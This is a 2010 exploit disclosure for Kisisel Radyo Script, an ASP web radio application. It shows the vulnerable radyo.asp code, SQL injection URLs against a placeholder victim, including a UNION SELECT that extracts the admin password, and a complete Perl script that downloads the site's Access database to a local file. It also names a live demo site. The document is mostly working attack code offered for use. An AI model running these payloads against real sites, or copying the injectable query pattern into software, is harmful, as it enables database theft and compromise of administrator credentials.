kisiselradyoscript-disclose.txt
Posted on 18 October 2010
Kisisel Radyo Script - Multiple Vulnerabilities ############################################ Author: FuRty Contact : fir4t@fir4t.org Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group ############################################ Script : Kisisel Radyo Script Version : N/A Download : http://www.aspindir.com ########################################### SQL Injection Vulnerable in radyo.asp #################################### id = Request.QueryString("id") Set baglanti = Server.CreateObject("Adodb.Connection") baglanti.Open "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & Server.MapPath(""&veriyolu&"") set rsust=Server.CreateObject("ADODB.RecordSet") sql = "Select * from sayfa WHERE id="&id&"" ############################################ http://VICTIM/path/radyo.asp?Id=2 and 1=1 [True] http://VICTIM/path/radyo.asp?Id=2 and 1=0 [False] http://VICTIM/path/radyo.asp?Id=2%20union%20select%200,1,adminsifre%20from%20siteayar%20where%20id=1 ############################################## Remote Database Disclosure Exploit ############################################## #!/usr/bin/perl -w # # Kisisel Radyo Script Remote Database Disclosure Exploit # Coded: FuRty # Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group # Contact : fir4t@fir4t.org # Demo: http://www.kardeslermarble.com/radyo/ use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Kisisel Radyo Script Remote Database Disclosure Exploit by FuRty'); system('color 4'); if(@ARGV < 2) { print "[-]Ornegi inceleyin "; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ "; print "[+] usage2 : perl $0 localhost / "; } print " ************************************************************************ "; print "* Kisisel Radyo Script Remote Database Disclosure Exploit * "; print "* Exploited By : FuRty * "; print "* msn : fir4t@fir4t.org * "; print "* Thanks: RedGuard,KnocKout, TrSniper and All Justic3 Group * "; print "********************************************************************* "; ($TargetIP, $path, $File,) = @ARGV; $File="sevvo/eco23.mdb"; my $url = "http://" . $TargetIP . $path . $File; print " wait!!! "; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "C:/db.mdb"); if ($request->is_success) { print "[+] $url Exploited! "; print "[+] Database saved to C:/db.mdb "; exit(); } else { print "[!] Exploiting $url Failed ! [!] ".$request->status_line." "; exit(); }